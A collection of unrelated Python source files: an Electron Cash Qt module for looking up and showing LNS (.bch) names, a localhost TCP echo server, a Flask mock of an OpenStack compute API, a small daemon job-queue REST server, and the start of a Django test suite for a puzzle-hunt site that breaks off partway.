                    addr_lbl.setToolTip(rb.toolTip())
                grid.addWidget(addr_lbl, row*3+1, col*5+1, 1, 3)
            if (col % cols) == 0:
                # insert stretch in between the two columns
                spacer = QSpacerItem(1,0)
                grid.addItem(spacer, row, col*5+4, 1, 1)
                grid.setColumnStretch(col*5+4, 10)
            if self.show_addresses:
                # in-between row spacer. Only added if showing addresses
                # to make the address line visually closer to the line above it
                spacer = QSpacerItem(1, 8)
                grid.addItem(spacer, row*3+2, col*5, 1, 4)
            col += 1
        if len(items) == 1:
            # just 1 item, put it on the left
            grid.addItem(QSpacerItem(2,1), 0, 5)
            grid.setColumnStretch(5, 100)
        if len(items) <= 2:
            # just 1 row, push it up to the top
            grid.addItem(QSpacerItem(1,2), 3, 0, -1, -1)
            grid.setRowStretch(3, 100)
        # Restore the selection captured before the rebuild (no-op for NoButton).
        if saved_selection and self.button_type != self.ButtonType.NoButton:
            for info in saved_selection:
                self.checkItemWithInfo(info)
        else:
            self.checkItemWithInfo(None)
def multiple_result_picker(parent, results, wallet=None, msg=None, title=None, gbtext=None):
    ''' Pops up a modal dialog telling you to pick a results. Used by the
    Contacts tab edit function, etc.

    Returns the chosen item with its trailing element stripped, or None if
    the user cancelled or selected nothing.  (`gbtext` is accepted for
    call-compatibility but is currently unused.) '''
    assert parent
    from .main_window import ElectrumWindow
    if isinstance(parent, ElectrumWindow) and not wallet:
        wallet = parent.wallet
    assert isinstance(wallet, Abstract_Wallet)
    msg = msg or _('Multiple results were found, please select an option from the items below:')
    title = title or _("Select LNS Name")

    dialog = WindowModalDialog(parent, title)
    util.finalization_print_error(dialog)  # track object lifecycle
    destroyed_print_error(dialog)

    layout = QVBoxLayout(dialog)
    layout.addWidget(WWLabel(msg))

    group_box = InfoGroupBox(dialog, parent, results)
    layout.addWidget(group_box)

    ok_button = OkButton(dialog)
    layout.addLayout(Buttons(CancelButton(dialog), ok_button))

    # OK stays disabled until the user actually picks one of the results.
    ok_button.setEnabled(False)
    group_box.buttonGroup().buttonClicked.connect(
        lambda x=None: ok_button.setEnabled(group_box.selectedItem() is not None))

    if dialog.exec_() == QDialog.Accepted:
        selection = group_box.selectedItem()
        if selection:
            return selection[:-1]
def lookup_lns_dialog(
    parent, wallet, *, # parent and wallet are required and parent must be an ElectrumWindow instance.
    title: str = None, # the title to use, defaults to "Lookup LNS Name" (translated) and is bold and larger. Can be rich text.
    blurb: str = None, # will appear in the same label, can be rich text, will get concatenated to title.
    title_label_link_activated_slot: Callable[[str], None] = None, # if you embed links in the blub, pass a callback to handle them
    button_type: InfoGroupBox.ButtonType = InfoGroupBox.ButtonType.NoButton, # see InfoGroupBox
    add_to_contacts_button: bool = False, # if true, the button bar will include an add to contacts button
    pay_to_button: bool = False # if true, the button bar will include a "pay to" button
) -> List[Tuple[lns.Info, str, str]]: # Returns a list of tuples
    ''' Shows the generic LNS Name lookup interface.

    Pops up a window-modal dialog in which the user can type an LNS Name
    (e.g. "satoshi.bch"), look it up over the network, and -- depending on
    `button_type` -- select one or more of the results.

    Returns ca.selectedItems() if the dialog was accepted, otherwise None.
    Also returns None immediately (after warning the user) when there is no
    network connection. '''
    from .main_window import ElectrumWindow
    # When there is a selection button, OK stays disabled until something is selected.
    ok_disables = button_type != InfoGroupBox.ButtonType.NoButton
    title = title or _("Lookup LNS Name")
    blurb = blurb or ''
    assert isinstance(parent, ElectrumWindow) and isinstance(wallet, Abstract_Wallet)
    if parent.gui_object.warn_if_no_network(parent):
        return None
    d = WindowModalDialog(parent.top_level_window(), title)
    d.setObjectName("WindowModalDialog - " + title)
    finalization_print_error(d)  # track object lifecycle
    destroyed_print_error(d)
    # Names of all existing 'lns'-type contacts; used by the add-to-contacts
    # button factory below to disable the button for already-known names.
    all_lns_contacts = set(contact.name for contact in wallet.contacts.get_all(nocopy=True) if contact.type == 'lns')
    vbox = QVBoxLayout(d)
    # Header row: icon + title/blurb label.
    hbox = QHBoxLayout()
    label = QLabel()
    label.setPixmap(QIcon(":icons/lns.png").pixmap(50))
    hbox.addWidget(label)
    hbox.addItem(QSpacerItem(10, 1))
    label = QLabel("<font size=+1><b>" + title + "</b></font>" + blurb)
    if callable(title_label_link_activated_slot):
        label.linkActivated.connect(title_label_link_activated_slot)
    label.setAlignment(Qt.AlignVCenter|Qt.AlignLeft)
    hbox.addWidget(label)
    hbox.addStretch(2)
    vbox.addLayout(hbox)
    # Input row: name field + Lookup button + "Search online..." link.
    grid = QGridLayout()
    grid.setContentsMargins(62, 32, 12, 12)
    acct = QLineEdit()
    acct.setPlaceholderText(_("LNS Name e.g. satoshi.bch"))
    acct.setMinimumWidth(280)
    label2 = WWLabel('<a href="https://app.bch.domains">' + _("Search online...") + "</a>")
    label2.linkActivated.connect(webopen)
    #acct.setFixedWidth(280)
    label = HelpLabel(_("&LNS Name"), _("Enter an LNS Name of the form satoshi.bch, and Electron Cash will search for the contact and present you with its resolved address."))
    label.setBuddy(acct)
    search = QPushButton(_("Lookup"))
    search.setEnabled(False)  # enabled by on_text_changed once the text parses
    grid.addWidget(label, 0, 0, 1, 1, Qt.AlignRight)
    grid.addWidget(acct, 0, 1, 1, 1, Qt.AlignLeft)
    grid.addWidget(search, 0, 2, 1, 1, Qt.AlignLeft)
    grid.addWidget(label2, 0, 3, 1, 1, Qt.AlignLeft)
    grid.setColumnStretch(3, 5)
    vbox.addLayout(grid)
    vbox.addItem(QSpacerItem(20,10))
    frame = QScrollArea()
    tit_lbl = QLabel()
    vbox.addWidget(tit_lbl)
    # Factories that build per-result extra buttons for the InfoGroupBox.
    extra_buttons = []
    # Extra Buttons
    if add_to_contacts_button:
        def create_add_to_contacts_button_callback(item: tuple) -> QPushButton:
            info, lns_string = item
            lns_string_em = wallet.lns.fmt_info(info)
            but = QPushButton(QIcon(":icons/tab_contacts.png"), "")
            if isinstance(info.address, Address):
                if lns_string not in all_lns_contacts and wallet.is_mine(info.address):
                    # We got a result for an LNS that happens to be ours. Remember it.
                    parent.set_contact(label=lns_string, address=info.address, typ='lns')
                    all_lns_contacts.add(lns_string)
                if lns_string in all_lns_contacts:
                    but.setDisabled(True)
                    but.setToolTip(_('<span style="white-space:nowrap"><b>{lns_name}</b> already in Contacts</span>').format(lns_name=lns_string_em))
                else:
                    add_str = _("Add to Contacts")
                    but.setToolTip(f'<span style="white-space:nowrap">{add_str}<br> <b>{lns_string_em}</b></span>')
                    del add_str
                    def add_contact_slot(ign=None, but=but, item=item):
                        # label, address, typ='address') -> str:
                        new_contact = parent.set_contact(label=lns_string, address=info.address, typ='lns')
                        if new_contact:
                            msg = _('<span style="white-space:nowrap"><b>{lns_name}</b> added to Contacts</span>').format(lns_name=lns_string_em)
                            but.setDisabled(True)
                            but.setToolTip(msg)
                            all_lns_contacts.add(new_contact.name)
                        else:
                            msg = _("Error occurred adding to Contacts")
                        QToolTip.showText(QCursor.pos(), msg, frame, QRect(), 5000)
                    # /add_contact
                    but.clicked.connect(add_contact_slot)
            else:
                but.setDisabled(True)
                but.setToolTip("<i>" + _("Unsupported Account Type") + "</i>")
            return but
        extra_buttons.append(create_add_to_contacts_button_callback)
    if pay_to_button:
        def create_payto_but(item):
            info, _name = item
            lns_string_em = wallet.lns.fmt_info(info)
            icon_file = ":icons/paper-plane.svg" if not ColorScheme.dark_scheme else ":icons/paper-plane_dark_theme.svg"
            but = QPushButton(QIcon(icon_file), "")
            if isinstance(info.address, Address):
                payto_str = _("Pay to")
                but.setToolTip(f'<span style="white-space:nowrap">{payto_str}<br> <b>{lns_string_em}</b></span>')
                but.clicked.connect(lambda: parent.is_alive() and parent.payto_payees([lns_string_em]))
                # Paying-to closes this dialog (rejected, so no selection is returned).
                but.clicked.connect(d.reject)
            else:
                but.setDisabled(True)
                but.setToolTip("<i>" + _("Unsupported Account Type") + "</i>")
            return but
        extra_buttons.append(create_payto_but)
    # /Extra Buttons
    ca = InfoGroupBox(frame, parent, button_type = button_type, title = '', extra_buttons=extra_buttons)
    ca.refresh()
    frame.setMinimumWidth(765)
    frame.setMinimumHeight(250)
    frame.setWidget(ca)
    frame.setWidgetResizable(True)
    vbox.addWidget(frame)
    search.setDefault(True)
    if ok_disables:
        # Selection mode: Enter in the text field is forwarded to Lookup, and
        # OK is disabled until the user selects a result.
        need_to_fwd_return = True
        ok = OkButton(d)
        ok.setDisabled(ok_disables)
        vbox.addLayout(Buttons(CancelButton(d), ok))
    else:
        need_to_fwd_return = False
        ok = CloseButton(d)
        ok.setDefault(False)
        vbox.addLayout(Buttons(ok))
    def ca_msg(m, clear=False):
        # Set the "no items" placeholder text, optionally clearing results.
        ca.no_items_text = m
        if clear:
            ca.setItems([], auto_resize_parent=False, title = '')
        else:
            ca.refresh()
        tit_lbl.setText('')
    def on_return_pressed():
        if need_to_fwd_return and search.isEnabled():
            search.click()
    def on_text_changed(txt):
        txt = txt.strip() if txt else ''
        search.setEnabled(bool(wallet.lns.parse_string(txt)))
        if not txt and not ca.items():
            ca_msg(" ")
    def on_search():
        # Perform the (blocking, dialog-guarded) network lookup + verification.
        ok.setDisabled(ok_disables)
        name = acct.text().strip()
        tup = wallet.lns.parse_string(name)
        if tup:
            ca_msg(_("Searching for <b>{lns_name}</b> please wait ...").format(lns_name=name), True)
            results = None
            exc = []
            t0 = time.time()
            def resolve_verify():
                nonlocal results
                results = wallet.lns.resolve_verify(name, exc=exc)
                results = [(item,item.name) for item in results]
            code = VerifyingDialog(parent.top_level_window(),
                                   _("Verifying LNS Name {name} please wait ...").format(name=name),
                                   resolve_verify, auto_show=False).exec_()
            if code == QDialog.Rejected:
                # user cancel -- the waiting dialog thread will continue to run in the background but that's ok.. it will be a no-op
                d.reject()
                return
            if results:
                ca.setItems(results, auto_resize_parent=False, title='', button_type = button_type) # suppress groupbox title
            else:
                ca_msg(_("The specified LNS Name does not appear to be associated with any BCH address"), True)
                if time.time()-t0 >= lns.timeout:
                    # Lookup took long enough that it likely timed out; explain why.
                    if (wallet.verifier and wallet.synchronizer and # check these are still alive: these could potentially go away from under us if wallet is stopped when we get here.
                            (not wallet.verifier.is_up_to_date() or not wallet.synchronizer.is_up_to_date())):
                        parent.show_message(_("No results found. However, your wallet is busy updating."
                                              " This can interfere with LNS lookups."
                                              " You may want to try again when it is done."))
                    else:
                        parent.show_message(_("A network timeout occurred while looking up this LNS Name. "
                                              "You may want to check that your internet connection is up and "
                                              "not saturated processing other requests."))
                elif exc and isinstance(exc[-1], requests.ConnectionError):
                    parent.show_error(_("A network connectivity error occured. Please check your internet connection and try again."))
            nres = len(results or [])
            title = "<b>" + name + "</b> - " + ngettext("{number} LNS Name", "{number} LNS Names", nres).format(number=nres)
            tit_lbl.setText(title)
        else:
            ca_msg(_("Invalid LNS Name, please try again"), True)
    acct.textChanged.connect(on_text_changed)
    search.clicked.connect(on_search)
    acct.returnPressed.connect(on_return_pressed)
    ca.buttonGroup().buttonClicked.connect(lambda x=None: ok.setEnabled(ok_disables and ca.selectedItem() is not None))
    ca_msg(" ")
    if d.exec_() == QDialog.Accepted:
        return ca.selectedItems()
    parent.contact_list.do_update_signal.emit() # In case they added some contacts, etc
    return None
def lns_detail_dialog(parent : MessageBoxMixin,  # Should be an ElectrumWindow instance
                      lns_string : str,  # LNS Name string eg: "satoshi.bch"
                      *, title : str = None  # The modal dialog window title
                      ) -> bool:  # returns True on success, False on failure
    ''' Shows the LNS Name details for any LNS Name.
    Note that parent should be a ElectrumWindow instance.
    `lns_string` is just an LNS Name string of the form:
        satoshi.bch
    Returns False on failure or True on success. User is presented with an error
    message box on False return.'''
    from .main_window import ElectrumWindow
    assert isinstance(parent, ElectrumWindow)
    wallet = parent.wallet
    assert isinstance(wallet, Abstract_Wallet)
    if not wallet.lns.parse_string(lns_string):
        parent.show_error(_("Invalid LNS Name:") + f" {lns_string}")
        return False
    # validate lns_string arg & resolve if need be
    info = wallet.lns.get_verified(lns_string)
    if not info:
        # need to look it up
        tup = resolve_lns(parent, lns_string, wallet)
        if not tup:
            # Error window was provided by resolve_lns, just return
            return False
        info, lns_string = tup
    # . <-- at this point we have a verified LNS name to display
    # Make sure it's not an unsupported type as the code at the end of this
    # file assumes info.address is an Address.
    if not isinstance(info.address, Address):
        parent.show_error(_("Unsupported payment data type.") + "\n\n"
                          + _("The LNS Name {name} uses an account type that "
                              "is not supported by Electron Cash.").format(name=lns_string))
        return False
    title = title or _("LNS Name Details")
    # create dialog window
    d = WindowModalDialog(parent.top_level_window(), title)
    d.setObjectName("WindowModalDialog - " + title)
    finalization_print_error(d)  # track object lifecycle
    destroyed_print_error(d)
    grid = QGridLayout(d)
    avatar_lbl = QLabel()
    def success_cb(data):
        ''' Install the downloaded avatar image into avatar_lbl. '''
        # NOTE(review): this is invoked from the download worker thread, and Qt
        # widgets are generally not safe to touch off the GUI thread -- consider
        # marshalling via a signal; preserved as-is for now.
        try:
            avatar_lbl.setText('')
            pix = QPixmap()
            pix.loadFromData(data)
            avatar_lbl.setPixmap(pix.scaled(75, 75, Qt.KeepAspectRatio, Qt.SmoothTransformation))
        except Exception:  # was a bare 'except:'; narrowed so ^C etc. aren't swallowed
            pass
    def thread_func():
        ''' Best-effort avatar fetch; must never raise or hang forever. '''
        url = f'https://metadata.bch.domains/smartbch/avatar/{lns_string}'
        try:
            # timeout added: without it a dead connection could hang the
            # daemon thread indefinitely.
            r = requests.get(url, allow_redirects=True, timeout=30)
        except requests.RequestException:
            return  # no avatar; leave the label blank
        if r.ok:
            success_cb(r.content)
    t = threading.Thread(name="LNS avatar download",
                         target=thread_func, daemon=True)
    t.start()
    avatar_lbl.setToolTip(f'<span style="white-space:nowrap;">{info.name}</span>')
    grid.addWidget(avatar_lbl, 0, 0, 3, 1)
    # Shrink the name font as the name gets longer so it still fits.
    fsize = 26
    if len(info.name) > 20:
        fsize = 15
    if len(info.name) > 30:
        fsize = 12
    if len(info.name) > 50:
        fsize = 10
    if len(info.name) > 90:
        fsize = 8
    name_txt = f'<span style="white-space:nowrap; font-size:{fsize}pt; font-weight:bold;">{info.name}'
    # Bug fix: previously appended '</span></span>' -- two closes for one open.
    name_txt += '</span>'
    def open_link(link):
        ''' Handle clicks on address / URL links in the labels below. '''
        if Address.is_valid(link):
            addr = Address.from_string(link)
            if wallet.is_mine(addr):
                parent.show_address(addr)
            else:
                addr_URL = web.BE_URL(parent.config, 'addr', addr)
                if addr_URL:
                    webopen(addr_URL)
            return
        if link.startswith('http'):
            webopen(link)
    # name
    name_lbl = QLabel(name_txt)
    grid.addWidget(name_lbl, 0, 1, 1, 1)
    # copy name
    copy_name_but = QPushButton()
    copy_name_but.setIcon(QIcon(":icons/copy.png"))
    button_make_naked(copy_name_but)
    copy_name_but.setToolTip('<span style="white-space:nowrap">'
                             + _("Copy <b>{lns_name}</b>").format(lns_name=info.name)
                             + '</span>')
    copy_name_but.clicked.connect(lambda ignored=None, ca_string_em=info.name, copy_but=copy_name_but:
                                      parent.copy_to_clipboard(text=ca_string_em, tooltip=_('Cash Account copied to clipboard'), widget=copy_but) )
    grid.addWidget(copy_name_but, 0, 2, 1, 1)
    # address label
    addr_lbl = QLabel(f'<span style="white-space:nowrap; font-size:15pt;"><a href="{info.address.to_ui_string()}"><pre>{info.address.to_ui_string()}</pre></a></span>')
    addr_lbl.linkActivated.connect(open_link)
    grid.addWidget(addr_lbl, 1, 1, 1, 1)
    # copy address label
    copy_addr_but = QPushButton()
    copy_addr_but.setIcon(QIcon(":icons/copy.png"))
    button_make_naked(copy_addr_but)
    copy_addr_but.setToolTip(_("Copy {}").format(_("Address")))
    copy_addr_but.clicked.connect(lambda ignored=None, text=info.address.to_ui_string(), copy_but=copy_addr_but:
                                      parent.copy_to_clipboard(text=text, tooltip=_('Address copied to clipboard'), widget=copy_but) )
    grid.addWidget(copy_addr_but, 1, 2, 1, 1)
    # registration date label
    reg_date_lbl = QLabel(f'<span style="white-space:nowrap; font-size:15pt;">Registration date: {util.format_time(info.registrationDate)}</span>')
    grid.addWidget(reg_date_lbl, 2, 1, 1, 1)
    # expiry date label
    exp_date_lbl = QLabel(f'<span style="white-space:nowrap; font-size:15pt;">Expiry date: {util.format_time(info.expiryDate)}</span>')
    grid.addWidget(exp_date_lbl, 3, 1, 1, 1)
    if not wallet.is_mine(info.address):
        ismine_txt = _("External Address") + ', '
    else:
        ismine_txt = _("My LNS Name") + ', '
    # Link out to the LNS web app for this name
    viewname_txt = _("View in LNS app")
    url = f'https://app.bch.domains/name/{info.name}'
    view_tx_lbl = QLabel(f'<span style="white-space:nowrap; font-size:11pt;">{ismine_txt} <a href="{url}">{viewname_txt}</a></span>')
    view_tx_lbl.setToolTip(_("View in LNS app"))
    view_tx_lbl.linkActivated.connect(open_link)
    grid.addWidget(view_tx_lbl, 4, 1, 1, 1, Qt.AlignTop | Qt.AlignRight)
    grid.setRowStretch(4, 1)
    # QR
    tabs = QTabWidget()
    full_addr_str = info.address.to_full_ui_string()
    qr_address = QRCodeWidget(full_addr_str, fixedSize=True)
    qr_address.setToolTip(full_addr_str)
    tabs.addTab(qr_address, _("Address"))
    qr_ca_string = QRCodeWidget(lns_string, fixedSize=True)
    qr_ca_string.setToolTip(lns_string)
    tabs.addTab(qr_ca_string, _("LNS Name"))
    qr_address.setMinimumSize(300, 300)
    qr_ca_string.setMinimumSize(300, 300)
    grid.addWidget(tabs, 5, 0, 1, -1, Qt.AlignTop | Qt.AlignHCenter)
    # Bottom buttons
    buttons = Buttons(OkButton(d))
    grid.addLayout(buttons, 6, 0, -1, -1)
    # make all labels allow select text & click links
    for c in d.children():
        if isinstance(c, QLabel):
            c.setTextInteractionFlags(c.textInteractionFlags() | Qt.TextSelectableByMouse | Qt.LinksAccessibleByMouse)
    try:
        d.exec_()
    except Exception:  # was a bare 'except:'; narrowed so ^C/SystemExit propagate
        pass
    return True
|
tcp_server_test.py | # coding=utf-8
"""Minimal threaded TCP echo server used for manual testing.

Ported from Python 2 to Python 3: print is now a function, and socket
payloads are handled as bytes (Python 3 sockets send/receive bytes, not str).
"""
import threading
import time

__author__ = 'xubinggui'

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('127.0.0.1', 9999))
s.listen(5)
print('Waiting for connection...')


def tcplink(sock, addr):
    """Serve one client: greet it, then echo until 'exit' or EOF."""
    print('Accept new connection from %s:%s...' % addr)
    sock.send(b'Welcome!')
    while True:
        data = sock.recv(1024)
        time.sleep(1)
        # An empty read means the peer closed the connection.
        if not data or data == b'exit':
            break
        sock.send(b'Hello, %s!' % data)
    sock.close()
    print('Connection from %s:%s closed.' % addr)


while True:
    # Accept a new connection:
    sock, addr = s.accept()
    # Spawn a thread to handle this TCP connection:
    t = threading.Thread(target=tcplink, args=(sock, addr))
    t.start()
|
app.py | from flask import Flask, render_template, request, redirect, jsonify, Response
app = Flask(__name__)
import json
import static_response
import uuid
import threading
import time
# In-memory list of server IDs known to this mock API; seeded with a dummy entry.
server_map = ["test"]
# Guards concurrent access to server_map from Flask request handlers.
lock = threading.Lock()
# def update_thread():
#     global stack_map
#     while True:
#         with lock:
#             stack_map['uptime'] = stack_map.get('uptime', 0) + 1
#         time.sleep(1.0)
@app.route('/v2.1/<id>/flavors', methods=['POST'])
def flavors(id):
    """Mock flavor creation: echo a canned flavor document for the posted body."""
    payload = request.json
    body = json.dumps(static_response.flavor_create(payload))
    return Response(body, status=200, mimetype='application/json')
@app.route('/v2.1/flavors/detail', methods=['GET'])
def flavors_detail():
    """Mock flavor listing: return the canned flavors_detail document."""
    body = json.dumps(static_response.flavors_detail)
    return Response(body, status=200, mimetype='application/json')
@app.route('/v2.1/<id>/flavors/detail', methods=['GET'])
def flavors_id_detail(id):
    """Project-scoped variant of the flavor listing; same canned document."""
    body = json.dumps(static_response.flavors_detail)
    return Response(body, status=200, mimetype='application/json')
@app.route('/v2.1/<id1>/flavors/<id>/os-extra_specs', methods=['GET'])
def flavors_extra(id1, id):
    """Mock flavor extra-specs lookup: return the canned flavor_extra document."""
    body = json.dumps(static_response.flavor_extra)
    return Response(body, status=200, mimetype='application/json')
@app.route('/v2.1/<id>/servers', methods=['POST'])
def servers(id):
    """Mock server creation: record a fresh UUID and answer 202 Accepted."""
    global server_map
    new_id = str(uuid.uuid4())
    app.logger.info('Server creation request Name : %s', new_id)
    # server_map is shared with other request handlers; mutate under the lock.
    with lock:
        server_map.append(new_id)
    body = json.dumps(static_response.servers(new_id))
    return Response(body, status=202, mimetype='application/json')
@app.route('/v2.1/<id>/servers/detail', methods=['GET'])
def servers_detail(id):
    """Mock server listing: render canned details for every recorded server."""
    # Serialize under the lock so a concurrent create can't mutate
    # server_map mid-serialization.
    with lock:
        body = json.dumps(static_response.servers_details(server_map))
    return Response(body, status=200, mimetype='application/json')
# @app.route('/v2.1/<id>/servers/<server_id>', methods=['GET'])
# def server_id(id, server_id):
# return Response(json.dumps(static_response.server_id(server_id)),
# status=200,
# mimetype='application/json')
@app.route('/v2.1/<req_type>/<req_id>', methods=['DELETE'])
def delete_data(req_type, req_id):
    """Mock DELETE handler: flavors answer 202, servers answer 204.

    Bug fix: previously an unknown req_type fell off the end of the function
    (implicit None return), which makes Flask raise a 500 error.  Unknown
    resource types now get an explicit 404.
    """
    if req_type == "flavors":
        return Response("",
                        status=202,
                        mimetype='application/json')
    elif req_type == "servers":
        return Response("",
                        status=204,
                        mimetype='application/json')
    return Response("",
                    status=404,
                    mimetype='application/json')
if __name__ == '__main__':
    # threading.Thread(target=update_thread).start()
    # Development server only: debug mode, listening on all interfaces.
    app.run(debug=True, host='0.0.0.0', port=9775)
|
server.py | from multiprocessing import Process
import logging
import urllib.parse

from flask import abort, Flask, g, request
""" A minimal server that will implement the REST API that we use to communicate
with the daemon. """
logger = logging.getLogger(__name__)
# Flask app.
_app = Flask(__name__)
# Queue we use to send data to the daemon
_queue = None
@_app.route("/add_job", methods=["POST"])
def _add_job():
    """ Adds a new job to the daemon. """
    logger.debug("Got HTTP request: %s" % (request.url))
    raw_job_dir = request.form.get("job_dir", None)
    if not raw_job_dir:
        logger.error("Invalid request with no job_dir parameter.")
        abort(400)
    # Forward the decoded job directory to the daemon over the queue.
    decoded = urllib.parse.unquote_plus(raw_job_dir)
    _queue.put({"type": "add_job", "job_dir": decoded})
    # No content to show.
    return ("", 204)
def _run_server(queue):
    """ Runs the flask server. Meant to be called in a different process.
    Args:
      queue: The queue to send requests for the main daemon on. """
    global _queue
    # Stash the queue in module state so request handlers (e.g. _add_job)
    # can reach it; then block serving HTTP requests.
    _queue = queue
    _app.run()
def start(queue):
    """ Starts the server running.
    Args:
      queue: The queue to send requests for the main daemon on.
    Returns:
      The started multiprocessing.Process.  (Previously the handle was
      discarded; returning it lets callers join() or terminate() the
      server, and is backward-compatible for callers that ignore it.) """
    logger.info("Starting new server...")
    server = Process(target=_run_server, args=(queue,))
    server.start()
    return server
|
tests.py | from django.test import TestCase, override_settings
from django.urls import reverse
from huntserver import models, forms, templatetags
from django.contrib.auth.models import User
from django.utils import timezone
from django.core.exceptions import ValidationError
from datetime import timedelta
try:
from SimpleHTTPServer import SimpleHTTPRequestHandler
except ImportError:
from http.server import SimpleHTTPRequestHandler
try:
from SocketServer import TCPServer as HTTPServer
except ImportError:
from http.server import HTTPServer
from threading import Thread
# python manage.py dumpdata --indent=4 --exclude=contenttypes --exclude=sessions --exclude=admin
# --exclude=auth.permission
# Users: admin, user1, user2, user3, user4, user5, user6
# admin is superuser/staff and on no teams
# user1 is on teams 2, 6, 8 (1-2, 2-3, 3-2)
# user2 is on teams 2, 6, 9 (1-2, 2-3, 3-3) # Reserved for ratelimiting
# user3 is on teams 3, 5 (1-3, 2-2 )
# user4 is on teams 3, 4 (1-3, 2-1 )
# user5 is on teams 6 ( 2-3 )
# user6 is not on any teams
# 3 Hunts: hunt 1 is in the past, hunt 2 is current and running, hunt 3 is in the future
# Hunt 1: Team limit of 5
# Hunt 2: Team limit of 3
# Hunt 3: Team limit of 3
# 3 puzzles per hunt
# 3 teams per hunt, in each hunt, second team is a playtesting team
def login(test, username):
    """Log *username* in via the test client (password is always 'password')
    and assert that the login succeeded."""
    logged_in = test.client.login(username=username, password='password')
    test.assertTrue(logged_in)
def get_and_check_page(test, page, code, args=None):
    """GET the named *page* (reversed with kwargs *args*) and assert the
    response status is *code*.  Returns the response.

    Fixed the mutable-default-argument anti-pattern (`args={}`); `None` now
    stands in for "no kwargs" and is normalized below, which is
    backward-compatible for all existing callers.
    """
    response = test.client.get(reverse(page, kwargs=args or {}))
    test.assertEqual(response.status_code, code)
    return response
def ajax_and_check_page(test, page, code, args=None):
    """GET the named *page* as an AJAX request (X-Requested-With header set),
    passing *args* as the GET data, and assert the response status is *code*.
    Returns the response.

    Fixed the mutable-default-argument anti-pattern (`args={}`); `None` now
    stands in for "no data" and is normalized below.
    """
    response = test.client.get(reverse(page), args or {},
                               **{'HTTP_X_REQUESTED_WITH': 'XMLHttpRequest'})
    test.assertEqual(response.status_code, code)
    return response
def message_from_response(response):
    """Return the first flash message attached to *response* as a string,
    or the empty string when there are no messages."""
    messages = list(response.context['messages'])
    return str(messages[0]) if messages else ""
def solve_puzzle_from_admin(test):
    """As user5, submit a fixed sequence of answers (solving puzzle 201 and
    attempting 202), then log back in as admin.  Used by admin-view tests
    that need pre-existing submissions/solves."""
    test.client.logout()
    login(test, 'user5')
    # (puzzle_id, answer) pairs, in the exact order the original test posted them.
    submissions = [
        ("201", "wrong answer"),
        ("201", "ANSWER21"),
        ("202", "wrong answer"),
        ("201", "wrong answer"),
    ]
    for puzzle_id, answer in submissions:
        response = test.client.post(
            reverse('huntserver:puzzle', kwargs={"puzzle_id": puzzle_id}),
            {'answer': answer})
        test.assertEqual(response.status_code, 200)
    test.client.logout()
    login(test, 'admin')
class nonWebTests(TestCase):
    """Tests of model/template-tag behavior that don't go through the web client."""
    fixtures = ["basic_hunt"]
    def setUp(self):
        # Create one instance of each per-team model so that test_unicode
        # below has at least one object of every type to stringify.
        puzzle = models.Puzzle.objects.get(pk=5)
        team = models.Team.objects.get(pk=2)
        models.Submission.objects.create(team=team, submission_time=timezone.now(), puzzle=puzzle,
                                         submission_text="foobar", modified_date=timezone.now())
        models.Solve.objects.create(puzzle=puzzle, team=team,
                                    submission=models.Submission.objects.all()[0])
        models.Unlock.objects.create(puzzle=puzzle, team=team, time=timezone.now())
        models.Message.objects.create(team=team, is_response=False, text="foobar",
                                      time=timezone.now())
        models.Unlockable.objects.create(puzzle=puzzle, content_type="TXT", content="foobar")
    def test_unicode(self):
        # Smoke-test every model's __str__ implementation.
        str(models.Hunt.objects.all()[0])
        str(models.Puzzle.objects.all()[0])
        str(models.Person.objects.all()[0])
        # str(models.Person.objects.all()[-1])
        str(models.Submission.objects.all()[0])
        str(models.Solve.objects.all()[0])
        str(models.Unlock.objects.all()[0])
        str(models.Message.objects.all()[0])
        str(models.Unlockable.objects.all()[0])
        str(models.Response.objects.all()[0])
        # str(models.HuntAssetFile.objects.all()[0])
    def test_hunt_cleaning(self):
        # Un-setting the only current hunt is expected to fail validation.
        with self.assertRaises(ValidationError):
            hunt = models.Hunt.objects.get(is_current_hunt=True)
            hunt.is_current_hunt = False
            hunt.save()
    def test_bootstrap_tag(self):
        templatetags.bootstrap_tags.active_page(None, None)
        # Try to cover Resolver404 case
class InfoTests(TestCase):
    """Tests for the informational pages: index, previous hunts, registration,
    user profile and contact-us."""
    fixtures = ["basic_hunt"]
    def test_index(self):
        "Test the index page"
        response = get_and_check_page(self, 'huntserver:index', 200)
        self.assertTrue(isinstance(response.context['curr_hunt'], models.Hunt))
    def test_previous_hunts(self):
        "Test the previous hunts page"
        response = get_and_check_page(self, 'huntserver:previous_hunts', 200)
        self.assertTrue('hunts' in response.context)
        for hunt in response.context['hunts']:
            self.assertTrue(isinstance(hunt, models.Hunt))
    def test_registration1(self):
        "Test the registration page when not logged in"
        response = get_and_check_page(self, 'huntserver:registration', 200)
        self.assertEqual(message_from_response(response), "")
    def test_registration2(self):
        "Test the registration page when logged in and on a team"
        login(self, 'user1')
        response = get_and_check_page(self, 'huntserver:registration', 200)
        self.assertTrue('registered_team' in response.context)
        self.assertTrue(isinstance(response.context['registered_team'], models.Team))
    def test_registration3(self):
        "Test the registration page when logged in and not on a team"
        login(self, 'user6')
        response = get_and_check_page(self, 'huntserver:registration', 200)
        self.assertEqual(message_from_response(response), "")
        self.assertTrue('teams' in response.context)
        for hunt in response.context['teams']:
            self.assertTrue(isinstance(hunt, models.Team))
    def test_registration_post_new(self):
        "Test the registration page's new team functionality"
        login(self, 'user6')
        post_context = {"form_type": "new_team", "team_name": "new_team",
                        "need_room": "need_a_room"}
        response = self.client.post(reverse('huntserver:registration'), post_context)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.context['user'].person.teams.all()), 1)
        team = response.context['user'].person.teams.all()[0]
        self.assertEqual(response.context['registered_team'], team)
        self.assertEqual(team.team_name, post_context['team_name'])
        self.assertEqual(team.location, post_context['need_room'])
        self.assertEqual(team.hunt, models.Hunt.objects.get(is_current_hunt=True))
        self.assertEqual(team.playtester, False)
        self.assertTrue(len(team.join_code) >= 5)
    def test_registration_post_join(self):
        "Test the registration page's join team functionality"
        login(self, 'user6')
        post_context = {"form_type": "join_team", "team_name": "Team2-2",
                        "join_code": "JOIN5"}
        response = self.client.post(reverse('huntserver:registration'), post_context)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.context['user'].person.teams.all()), 1)
        team = response.context['user'].person.teams.all()[0]
        self.assertEqual(response.context['registered_team'], team)
        self.assertEqual(team.team_name, post_context['team_name'])
        self.assertEqual(team.hunt, models.Hunt.objects.get(is_current_hunt=True))
        self.assertEqual(len(team.person_set.all()), 2)
    def test_registration_post_leave(self):
